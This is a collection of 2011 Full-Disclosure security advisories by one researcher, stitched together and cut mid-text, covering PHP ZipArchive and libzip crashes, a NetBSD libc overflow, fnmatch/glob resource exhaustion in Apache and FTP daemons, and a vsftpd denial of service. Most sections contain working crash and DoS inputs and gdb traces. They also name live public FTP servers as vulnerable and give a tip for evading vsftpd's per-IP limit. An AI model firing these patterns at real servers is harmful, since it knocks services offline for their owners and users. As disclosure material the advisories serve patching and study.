can put something else that 0x0, it would have security impact.
There are more interesting places, where user may try change size of
malloc. See bellow
- -id0-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/curl/interface.c?view=markup
820 if (!CRYPTO_get_id_callback()) {
821 int i, c = CRYPTO_num_locks();
822
823 php_curl_openssl_tsl = malloc(c * sizeof(MUTEX_T));
824
825 for (i = 0; i < c; ++i) {
826 php_curl_openssl_tsl[i] = tsrm_mutex_alloc();
827 }
828
829 CRYPTO_set_id_callback(php_curl_ssl_id);
830 CRYPTO_set_locking_callback(php_curl_ssl_lock);
831 }
- -id0-end-
- -id1-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_date.c?view=markup
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_iso_intervals.c?view=markup
multiple malloc/calloc/realloc
323 uchar *buf = (uchar*) malloc(((s->lim - s->bot) +
BSIZE)*sizeof(uchar));
324 memcpy(buf, s->tok, s->lim - s->tok);
496 str = calloc(1, end - begin + 1);
497 memcpy(str, begin, end - begin);
346 s->errors->warning_messages =
realloc(s->errors->warning_messages, s->errors->warning_count *
sizeof(timelib_error_message));
347 s->errors->warning_messages[s->errors->warning_count -
1].position = s->tok ? s->tok - s->str : 0;
348 s->errors->warning_messages[s->errors->warning_count -
1].character = s->tok ? *s->tok : 0;
349 s->errors->warning_messages[s->errors->warning_count -
1].message = strdup(error);
- -id1-end-
- -id2-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_tz.c?view=markup
210 tz->location.comments = malloc(comments_len + 1);
211 memcpy(tz->location.comments, *tzf, comments_len);
212 tz->location.comments[comments_len] = '\0';
213 *tzf += comments_len;
- -id2-end-
- -id3-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/timelib.c?revision=305315&view=markup
124 tmp->trans = (int32_t *) malloc(tz->timecnt * sizeof(int32_t));
125 tmp->trans_idx = (unsigned char*) malloc(tz->timecnt *
sizeof(unsigned char));
126 memcpy(tmp->trans, tz->trans, tz->timecnt * sizeof(int32_t));
127 memcpy(tmp->trans_idx, tz->trans_idx, tz->timecnt *
sizeof(unsigned char));
128
129 tmp->
[Full-disclosure] PHP 5.3.6 ZipArchive invalid use glob(3)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.3.6 ZipArchive invalid use glob(3) ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/
Date:
- - Dis.: 01.04.2011
- - Pub.: 19.08.2011
CVE: CVE-2011-1657
Affected Software (verified):
PHP 5.3.6 and prior
Fixed:
PHP 5.3.7
Original URL:
http://securityreason.com/achievement_securityalert/100
- --- 0.Description ---
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic web pages. For this purpose, PHP code is
embedded into the HTML source document and interpreted by a web server
with a PHP processor module, which generates the web page document. It
also has evolved to include a command-line interface capability and can
be used in standalone graphical applications.
ZipArchive
This extension enables you to transparently read or write ZIP compressed
archives and the files inside them.
- --- 1. PHP 5.3.6 ZipArchive invalid use glob(3) ---
Functions like addGlob and addPattern are not described in
documentation. Anyway we can call to ZipArchive::addGlob and
ZipArchive::addPattern in PHP 5.3.6
http://pl2.php.net/manual/en/class.ziparchive.php
let's see ext/zip/php_zip.c
531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL,
&globbuf))) {
...
1629/* 1 == glob, 2==pcre */
1630if (type == 1) {
1631if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|la",
1632&pattern, &pattern_len, &flags, &options) == FAILURE) {
1633return;
1634}
1635} else {
1636if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|sa",
1637&pattern, &pattern_len, &path, &path_len, &options) == FAILURE) {
1638return;
1639}
1640}
1641
invalid &flags may provide to crash. To use flags like GLOB_ALTDIRFUNC,
we should first declare gl_opendir, gl_closedir, gl_lstat, gl_stat. In
PHP we only have
508 glob_t globbuf;
...
530 globbuf.gl_offs = 0;
531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL,
&globbuf))) {
for addglob() there are no GLOB flags validation like in php/glob().
Only flags like
GLOB_MARK|GLOB_NOSORT|GLOB_NOCHECK|GLOB_NOESCAPE|GLOB_BRACE|GLOB_ONLYDIR|GLOB_ERR
should be allowed:
- - GLOB_MARK - Adds a slash to each directory returned
- - GLOB_NOSORT - Return files as they appear in the directory (no sorting)
- - GLOB_NOCHECK - Return the search pattern if no files matching it were
found
- - GLOB_NOESCAPE - Backslashes do not quote metacharacters
- - GLOB_BRACE - Expands {a,b,c} to match 'a', 'b', or 'c'
- - GLOB_ONLYDIR - Return only directory entries which match the pattern
- - GLOB_ERR - Stop on read errors (like unreadable directories), by
default errors are ignored.
- ---linux/ubuntu---
cx@cx64:~$ php -v
PHP 5.3.3-1ubuntu9.3 with Suhosin-Patch (cli) (built: Jan 12 2011 16:07:38)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
cx@cx64:~$ uname -a
Linux cx64 2.6.35-28-generic #49-Ubuntu SMP Tue Mar 1 14:39:03 UTC 2011
x86_64 GNU/Linux
cx@cx64:/www$ cat zip.php
open("empty.zip");$nx->addGlob(str_repeat("*",33),0x39);
?>cx@cx64:/www$ php zip.php
Segmentation fault
- ---linux/ubuntu---
Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6)
- ---bsd/netbsd---
unlink("empty.zip"); fopen("empty.zip","a"); $nx=new
ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("A",100),0x39);
Program received signal SIGSEGV, Segmentation fault.
0xbb86bb12 in realloc () from /usr/lib/libc.so.12
(gdb) i r
eax0x410041 4259905
ecx0xc 12
edx0xbfb0 -1078984704
ebx0xbb8c81f4 -1148419596
esp0xbfbfa980 0xbfbfa980
ebp0xbfbfa9d8 0xbfbfa9d8
esi0xfc000 1032192
edi0x0 0
eip0xbb86bb12 0xbb86bb12
(gdb) x/i $eip
0xbb86bb12 : mov0x8(%eax),%edi
(gdb) x/i $eax
0x410041: Cannot access memory at address 0x410041
- ---bsd/netbsd---
and now try 'B'
- ---bsd/netbsd---
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new
ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("B",100),0x39);
(gdb) x/i $eip
0xbb86bb12 : mov0x8(%eax),%edi
(gdb) x/i $eax
0x420042: Cannot access memory at address 0x420042
- ---bsd/netbsd---
A we get mov0x8(%eax),%edi where eax=0x410041
B we get mov0x8(%eax),%edi where eax=0x420042
and once again for eax=0x0
- ---bsd/netbsd---
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob("aa",0x39);
Program received signal SIGSEGV, Segmentation fault.
0xbb8e2960 in pthread_mutex_lock () from /usr/lib/libpthread.so.0
(gdb) bt
#0
[Full-disclosure] NetBSD 5.1 libc/net multiple functions stack buffer overflow
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ NetBSD 5.1 libc/net multiple functions stack buffer overflow ]
Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
Date:
- - Dis.: 01.04.2011
- - Pub.: 01.07.2011
CVE: CVE-2011-1656
CWE: CWE-121
Affected software:
- - NetBSD 5.1 (fixed)
Affected functions:
- - getservbyname(3)
- - getservbyname_r(3)
- - getservbyport(3)
- - getservbyport_r(3)
- - getaddrinfo(3)
- - getnameinfo(3)
Original URL:
http://securityreason.com/achievement_securityalert/99
- --- 0.Description ---
The getservbyname(), and getservbyport() functions each return a pointer
to an object with the following structure containing the broken-out
fields of a line in the network services data base,
struct servent *
getservbyname(const char *name, const char *proto);
struct servent *
getservbyport(int port, const char *proto);
The getservbyname() and getservbyport() functions sequentially search
from the beginning of the file until a matching protocol name or port
number is found, or until EOF is encountered. If a protocol name is
also supplied (non-NULL), searches must also match the protocol.
- --- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow ---
The main problem exists in files like getservbyname_r.c and
getservbyport_r.c. Functions getservbyname*(3), getservbyport*(3) and
getaddrinfo(3) of NetBSD libc implementation, provides to possible
buffer overflow. To demonstrate this issue, we may use PHP as an attack
vector.
127# php -r 'getservbyname("A",str_repeat("A",7108));'
127# php -r 'getservbyname("A",str_repeat("A",7109));'
Memory fault (core dumped)
- -php-5.3.6/ext/standard/basic_functions.c---
PHP_FUNCTION(getservbyname)
{
char *name, *proto;
int name_len, proto_len;
struct servent *serv;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &name,
&name_len, &proto, &proto_len) == FAILURE) {
return;
}
...
serv = getservbyname(name, proto); < CALL TO LIBC
- -php-5.3.6/ext/standard/basic_functions.c---
BT:
#0 0xbb8b2d65 in __log2 () from /usr/lib/libc.so.12
#1 0xbb8afa2e in __call_hash () from /usr/lib/libc.so.12
#2 0xbb8b0ebd in __hash_open () from /usr/lib/libc.so.12
#3 0xbb8884c2 in getservbyname_r () from /usr/lib/libc.so.12
#4 0xbb822f6f in getservbyname () from /usr/lib/libc.so.12
#5 0x08334458 in php_get_highlight_struct ()
Let's see what is wrong with getservbyname().
- -getservbyname.c---
struct servent *
getservbyname(const char *name, const char *proto)
{
struct servent *s;
mutex_lock(&_servent_mutex);
s = getservbyname_r(name, proto, &_servent_data.serv, &_servent_data);
<=== REFERENCE
mutex_unlock(&_servent_mutex);
return (s);
}
- -getservbyname.c---
as we can see, getservbyname(3) redirect to getservbyname_r(3) function.
- -getservbyname_r.c---
if (sd->flags & _SV_DB) {
char buf[BUFSIZ];
DBT key, data;
DB *db = sd->db;
key.data = buf;
if (proto == NULL)
key.size = snprintf(buf, sizeof(buf), "\376%s", name);
<= INVALID
key.size HERE
else
key.size = snprintf(buf, sizeof(buf), "\376%s/%s",
<= INVALID
key.size HERE
name, proto);
key.size++;
if ((*db->get)(db, &key, &data, 0) != 0)
return NULL;
if ((*db->get)(db, &data, &key, 0) != 0)
return NULL;
- -getservbyname_r.c---
key.size may be bigger as BUFSIZ.
snprintf(3) return number of characters that would have been written had
size been sufficiently large (not counting the terminating null). In
this case, snprintf(3) return bigger value as sizeof(buf). In older libc
implementations, snprintf(3) should return -1, if the string is truncated.
The same problem is with getservbyport_r(3).
- -getservbyname_r.c---
if (sd->flags & _SV_DB) {
char buf[BUFSIZ];
DBT key, data;
DB *db = sd->db;
key.data = buf;
port = htons(port);
if (proto == NULL)
key.size = snprintf(buf, sizeof(buf), "\377%d", port);
<= INVALID
key.size HERE
else
key.size = snprintf(buf, sizeof(buf), "\377%d/%s",
port, <=
INVALID key.size HERE
proto);
key.size++;
if ((*db->get)(db, &key, &data, 0) != 0)
return NULL;
if ((*db->get)(
[Full-disclosure] Multiple Vendors libc/fnmatch(3) DoS (incl apache poc)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ]
Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 29.01.2011
- - Pub.: 13.05.2011
CVE: CVE-2011-0419
CWE: CWE-399
Affected Software (verified):
- - Apache 2.2.17
- - NetBSD 5.1
- - OpenBSD 4.8
- - FreeBSD
- - MacOSX 10.6
- - SunSolaris 10
Original URL:
http://securityreason.com/achievement_securityalert/98
- --- 0.Description ---
fnmatch -- match filename or pathname using shell glob rules
SYNOPSIS
#include
int
fnmatch(const char *pattern, const char *string, int flags);
- --- 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ---
Attacker, what may modify first and second parameters(pattern,string) of
fnmatch(3), may cause to CPU resource exhaustion. To see problem huge
complexity, try compile code below:
fnmatch("?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*","xx",0);
fnmatch should return quickly answer, logically int.
- -fnmatch()/netbsd/fnmatch.c--
/* Collapse multiple stars. */
while (c == '*')
c = FOLDCASE(*++pattern, flags);
- -fnmatch()/netbsd/fnmatch.c--
fnmatch() skip multiple stars here. It protect us before patterns like
"...", but not before "*?*?*?*?*?*?*?*?*?*?*?...".
Let's see what will happen if we use single star in pattern:
- -fnmatch()/netbsd/fnmatch.c--
case '*':
c = FOLDCASE(*pattern, flags);
/* Collapse multiple stars. */
while (c == '*')
c = FOLDCASE(*++pattern, flags);
if (*string == '.' && (flags & FNM_PERIOD) &&
(string == stringstart ||
((flags & FNM_PATHNAME) && *(string - 1) == '/')))
return (FNM_NOMATCH);
...
/* General case, use recursion. */
while ((test = FOLDCASE(*string, flags)) != EOS) {
if (!fnmatch(pattern, string,
<== RECURSION
flags & ~FNM_PERIOD))
return (0);
if (test == '/' && flags & FNM_PATHNAME)
break;
++string;
}
return (FNM_NOMATCH);
- -fnmatch()/netbsd/fnmatch.c--
Recursion in this code:
if (!fnmatch(pattern, string, <=== RECURSION WITHOUT LIMITS
may cause to denial of service. Some recursion limit is missing here.
Fix has been created together with NetBSD and should work on all BSD's
implementations of fnmatch(3). To fix it, limit recursion_level to 64,
because it guaranty quickly result. e.g.
- -fix---
...
static int
fnmatchx(const char *pattern, const char *string, int flags, size_t
recursion) <=== ADD ( size_t recursion )
{
const char *stringstart;
char c, test;
_DIAGASSERT(pattern != NULL);
_DIAGASSERT(string != NULL);
if (recursion-- == 0) <=== DECREMENT recursion_level
return FNM_NORES;
...
int
fnmatch(const char *pattern, const char *string, int flags)
{
return fnmatchx(pattern, string, flags, 64); <=== SET recursion_level
HERE
}
...
- -fix---
This fix limit max recursion level to 64. Any bigger value, may be unsafe.
To demonstrate this flaws, i'm using apache with mod_autoindex because
it's best vector here. There are two ways to denial of service, local
and remote.
IMPORTANT:
fnmatch(const char *pattern, const char *string, int flags);
strlen(string) should be smaller as strlen(pattern)
let's start
- -apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c---
...
/* Collapse multiple stars. */
while (c == '*') {
c = *++pattern;
}
...
/* General case, use recursion. */
while ((test = *string) != EOS) {
if (!apr_fnmatch(pattern, string, flags & ~APR_FNM_PERIOD)) {
<=== RECURSION
return (APR_SUCCESS);
...
- -apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.c---
This is BSD implementation of
[Full-disclosure] Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion ]
Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
- Dis.: 19.01.2011
- Pub.: 02.05.2011
CVE: CVE-2011-0418
Affected Software (verified):
- - NetBSD 5.1
- - and more
Original URL:
http://securityreason.com/achievement_securityalert/97
- --- 0.Description ---
#include
int glob(const char *pattern, int flags,
int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);
Description
This function expands a filename wildcard which is passed as pattern.
GLOB_LIMIT Limit the amount of memory used by matches to ARG_MAX. This
option should be set for programs that can be coerced to a denial of
service attack via patterns that expand to a very large number of
matches, such as a long string of */../*/..
- --- 1. Multiple Vendors libc/glob(3) GLOB_BRACE|GLOB_LIMIT memory
exhaustion ---
Analyzing history of GLOB_LIMIT, we should start since 2001, where it
has been added to protect ftp servers before memory exhaustion.
http://www.mail-archive.com/bugtraq@securityfocus.com/msg04960.html
Any 'pattern', should be limited and controlled by GLOB LIMIT. Algorithm
used in glob(3) is not optimal, and doesn't support functions like
realpath() to eliminate duplicates. It's not easy to predict the
greatest possible complexity. Anyway in 2010, netbsd has extended
GLOB_LIMIT for a few new limits like: stats, readdir and malloc
OpenBSD has localized some integer overflow. In glob(3) function, exists
some malloc() allowing allocate nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h
- -globextend()/openbsd--
749: newn = 2 + pglob->gl_pathc + pglob->gl_offs;
750: if (pglob->gl_offs >= INT_MAX ||
751: pglob->gl_pathc >= INT_MAX ||
752: newn >= INT_MAX ||
753: SIZE_MAX / sizeof(*pathv) <= newn ||
754: SIZE_MAX / sizeof(*statv) <= newn) {
755: nospace:
756: for (i = pglob->gl_offs; i < (ssize_t)(newn - 2); i++) {
757: if (pglob->gl_pathv && pglob->gl_pathv[i])
758: free(pglob->gl_pathv[i]);
759: if ((pglob->gl_flags & GLOB_KEEPSTAT) != 0 &&
760: pglob->gl_pathv && pglob->gl_pathv[i])
761: free(pglob->gl_statv[i]);
762: }
763: if (pglob->gl_pathv) {
764: free(pglob->gl_pathv);
765: pglob->gl_pathv = NULL;
766: }
767: if (pglob->gl_statv) {
768: free(pglob->gl_statv);
769: pglob->gl_statv = NULL;
770: }
771: return(GLOB_NOSPACE);
772: }
- -globextend()/openbsd--
however SIZE_MAX and INT_MAX doesn't protect us before memory
exhaustion. The real problem here is uncontrolled malloc(3) call.
globextend() will be executed a lot of times and we should reduce calls
to glob0() and globexp1(). Therefore has been created a new limit,
limiting 'braces' used in 'pattern'.
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29
If we don't reduce this call
- -globextend()/netbsd--
static int
globextend(const Char *path, glob_t *pglob, size_t *limit)
{
char **pathv;
size_t i, newsize, len;
char *copy;
const Char *p;
_DIAGASSERT(path != NULL);
_DIAGASSERT(pglob != NULL);
newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);
pathv = pglob->gl_pathv ? realloc(pglob->gl_pathv, newsize) :
malloc(newsize); < UNSECURE CALL
...
- -globextend()/netbsd--
newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);
malloc(3) try allocate (4*pglob->gl_pathc) bytes.
- -PoC-
USER anonymous
PASS b...@bla.bla
STAT
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
- -PoC-
in result we get
Jan 19 04:49:17 127 /netbsd: UVM: pid 615 (ftpd), uid 1003 killed: out
of swap
Many servers are still vulnerable to the above vulnerability and
CVE-2010-4754, CVE-2010-4755, CVE-2010-4756, CVE-2010-2632. Servers like
ftp.sun.com ftp.sony.com seems still be affected.
- --- 2. References ---
http://securityreason.com/achievement_securityalert/89
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2010-008.txt.asc
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.avaya.com/css/P8/documents/10012789
[Full-disclosure] libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5) ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 03.01.2011
- - Pub.: 18.03.2011
CVE: CVE-2011-0421
CERT: VU#325039
Affected Software:
- - libzip 0.9.3
- - PHP 5.3.5 (fixed 5.3.6)
Original URL:
http://securityreason.com/achievement_securityalert/96
- --- 0.Description ---
libzip is a C library for reading, creating, and modifying zip archives.
Files can be added from data buffers, files, or compressed data copied
directly from other zip archives. Changes made without closing the
archive can be reverted. The API is documented by man pages.
- --- 1.Description ---
libzip allows remote and local attackers to Denial of Service (Null
Pointer Dereference) if ZIP_FL_UNCHANGED flag is set.
- -lib/zip_name_locate.c---
int
_zip_name_locate(struct zip *za, const char *fname, int flags,
struct zip_error *error)
{
int (*cmp)(const char *, const char *);
const char *fn, *p;
int i, n;
if (fname == NULL) {
_zip_error_set(error, ZIP_ER_INVAL, 0);
return -1;
}
cmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp;
n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <=
CRASH HERE
- -lib/zip_name_locate.c---
for empty zip file and ZIP_FL_UNCHANGED flag, libzip should crash.
Currently for PHP, the security impact we estimate only like a remote
DoS, so risk is low.
Project using libzip: KDE Utilities (4.x branch), MySQL Workbench,
ckmame, fuse-zip, php zip extension, Endeavour2, FreeDink
Better analysis based on PHP code ZipArchive, bellow
- --- 2. PHP 5.3.5 ZipArchive() ---
PoC1:
php -r '$nx=new
ZipArchive();$nx->open("/dev/null");$nx->locateName("a",ZIPARCHIVE::FL_UNCHANGED);'
PoC2:
php -r '$nx=new
ZipArchive();$nx->open("empty.zip");$nx->statName("a",ZIPARCHIVE::FL_UNCHANGED);'
Let's
- -php_zip.c-
...
static ZIPARCHIVE_METHOD(locateName)
{
...
ZIP_FROM_OBJECT(intern, this);
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l",
&name, &name_len, &flags) == FAILURE) {
return;
}
...
idx = (long)zip_name_locate(intern, (const char *)name, flags); <===
CRASH IN THIS FUNCTION
...
- -php_zip.c-
and let`s see
- -zip_name_locate.c-
ZIP_EXTERN(int)
zip_name_locate(struct zip *za, const char *fname, int flags)
{
return _zip_name_locate(za, fname, flags, &za->error);
}
int
_zip_name_locate(struct zip *za, const char *fname, int flags,
struct zip_error *error)
{
int (*cmp)(const char *, const char *);
const char *fn, *p;
int i, n;
if (fname == NULL) {
_zip_error_set(error, ZIP_ER_INVAL, 0);
return -1;
}
cmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp;
n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry; <===
CRASH HERE IF ZIPARCHIVE::FL_UNCHANGED
for (i=0; icdir->nentry : za->nentry;
(gdb) print za->cdir->nentry
Cannot access memory at address 0x8
(gdb) print za->nentry
$21 = 0
because
(gdb) x/i $rip
=> 0x6407cc <_zip_name_locate+236>: mov0x8(%rax),%eax
(gdb) x/i $rax
0x0: Cannot access memory at address 0x0
(gdb) x/i $eax
call to zip_name_locate
(gdb) n
1877idx = (long)zip_name_locate(intern, (const char *)name,
flags);
(gdb) print intern
$24 = (struct zip *) 0x118d580
(gdb) x/x intern
0x118d580: 0x0118d220
(gdb) x/40x intern
0x118d580: 0x0118d220 0x 0x0118d340 0x
0x118d590: 0x 0x 0x 0x
0x118d5a0: 0x 0x 0x 0x
0x118d5b0: 0x 0x 0x 0x
0x118d5c0: 0x 0x 0x 0x
0x118d5d0: 0x 0x 0x 0x
0x118d5e0: 0x 0x 0x00020a21 0x
0x118d5f0: 0x 0x 0x 0x
0x118d600: 0x 0x 0x 0x
0x118d610: 0x 0x 0x 0x
next PoC2
$nx=new
ZipArchive();$nx->open("empty.zip");$nx->statName("9223372036854775808","9223372036854775807");
rogram received signal SIGSEGV, Segmentation fault.
0x006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0
"9223372036854775808", flags=32767,
error=0xdac0) at
/build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65
65 in /build/buildd/php5-5.3.3
[Full-disclosure] vsftpd 2.3.2 remote denial-of-servic
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ vsftpd 2.3.2 remote denial-of-service ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 23.12.2010
- - Pub.: 01.03.2011
CVE: CVE-2011-0762
CERT: VU#590604
Fix: vsftpd 2.3.4 (15.02.2011)
Affected Software (verified):
- - vsftpd 2.3.2 (NetBSD 5.1)
- - vsftpd 2.3.0 (Ubuntu 10.10)
Affected Servers (19.02.2011):
- - ftp.gnu.org (2.0.6)
- - ftp.kernel.org (2.2.2)
- - ftpgen.wip4.adobe.com (2.3.2)
- - ftp.oracle.com (2.0.5)
- - ftp.freebsd.org (2.2.0)
- - more more more...
Original URL:
http://securityreason.com/achievement_securityalert/95
- --- 0.Description ---
vsftpd is a GPL licensed FTP server for UNIX systems, including Linux.
It is secure and extremely fast. It is stable. Don't take my word for
it, though. Below, we will see evidence supporting all three assertions.
We will also see a list of a few important sites which are happily using
vsftpd. This demonstrates vsftpd is a mature and trusted solution.
- --- 1. vsftpd 2.3.2 remote denial-of-service ---
As we can read in "ls.c" vsftpd file...
- ---
...
* parsing and handling. There is broad potential for any given fnmatch(3)
* implementation to be buggy.
*
* Currently supported pattern(s):
* - any number of wildcards, "*" or "?"
* - {,} syntax (not nested)
...
- ---
That true but anyone who has changed ftpd bsd daemon to vsftpd to
protect before CVE-2010-2632 (glob(3) resource exhaustion) are in
danger. Any code with huge complexity, could allow of denial of service
if an affected system received vulnerable pattern. This bug allow to
disable wide range of servers. To designate vulnerable servers, we have
to used pattern with medium complexity.
- -Example affected server---
cx@cx64:~$ telnet ftp.gnu.org 21
Trying 140.186.70.20...
Connected to ftp.gnu.org.
Escape character is '^]'.
220 GNU FTP server ready.
USER anonymous
PASS a...@cadabra.abw
STAT {{*},}
...
230 Login successful.
230 Already logged in.
213-Status follows:
- -Example affected server---
Execution time may have wide range depending on the length of pattern:
empty 2388 97.3 0.0 37980 1352 ?RDec23 222:42
/usr/sbin/vsftpd
222m and counting...
so any next {{*},Recursion} will increment the complexity. Let's see
what is wrong and where. In vsftpd the main problem exists in ls.c.
- -ls.c--
int
vsf_filename_passes_filter(const struct mystr* p_filename_str,
const struct mystr* p_filter_str)
{
...
else if (last_token == '{')
{
struct str_locate_result end_brace =
str_locate_char(&filter_remain_str, '}');
must_match_at_current_pos = 1;
if (end_brace.found)
{
str_split_char(&filter_remain_str, &temp_str, '}');
str_copy(&brace_list_str, &filter_remain_str);
str_copy(&filter_remain_str, &temp_str);
str_split_char(&brace_list_str, &temp_str, ',');
while (!str_isempty(&brace_list_str))
{
str_copy(&new_filter_str, &brace_list_str);
str_append_str(&new_filter_str, &filter_remain_str);
if (vsf_filename_passes_filter(&name_remain_str,
&new_filter_str)) <= LIMIT THIS CALL
{
ret = 1;
...
- -ls.c--
Code:
if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str))
<= LIMIT THIS CALL
this call should be limited, and in version 2.3.4 has been fixed.
A simple way to show growth in computing power ...
(1*2*3*4*...*count(vsf_filename_passes_filter complexity)) ==
count(vsf_filename_passes_filter complexity)!
Compare two patterns and see different between
STAT
{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}
and add next {*,...}
STAT
{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}
and in the end, compare:
STAT
{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}}
hovever in vsftpd, command lenght is allowed to 4096 bytes. So it's no
problem to create request with a huge complexity
To bypass max_per_ip, use ISP with dynamic ip. Disconnect and connect
(example for bt mobile phone):
cx@cx64:~$ hciconfig hci0 down
cx@cx64:~$ hciconfig hci0 up
and connect again.
- ---PoC
Re: [Full-disclosure] glibc and alloca()
Chris Evans gmail.com> writes: > Linux distribution might still have vulnerabilities in this area. proftpd use gnu libc implementation http://www.proftpd.org/docs/RELEASE_NOTES-1.3.4rc1 + Updated fnmatch implementation, using glibc-2.9 version. Version 1.3.3d may contain this issue -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.3.5 grapheme_extract() NULL Pointer Dereference
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 09.12.2010
- - Pub.: 17.02.2011
CVE: CVE-2011-0420
CERT: VU#210829
Affected Software:
- - PHP 5.3.5
Fixed: SVN
Original URL:
http://securityreason.com/achievement_securityalert/94
- --- 0.Description ---
Internationalization extension (further is referred as Intl) is a
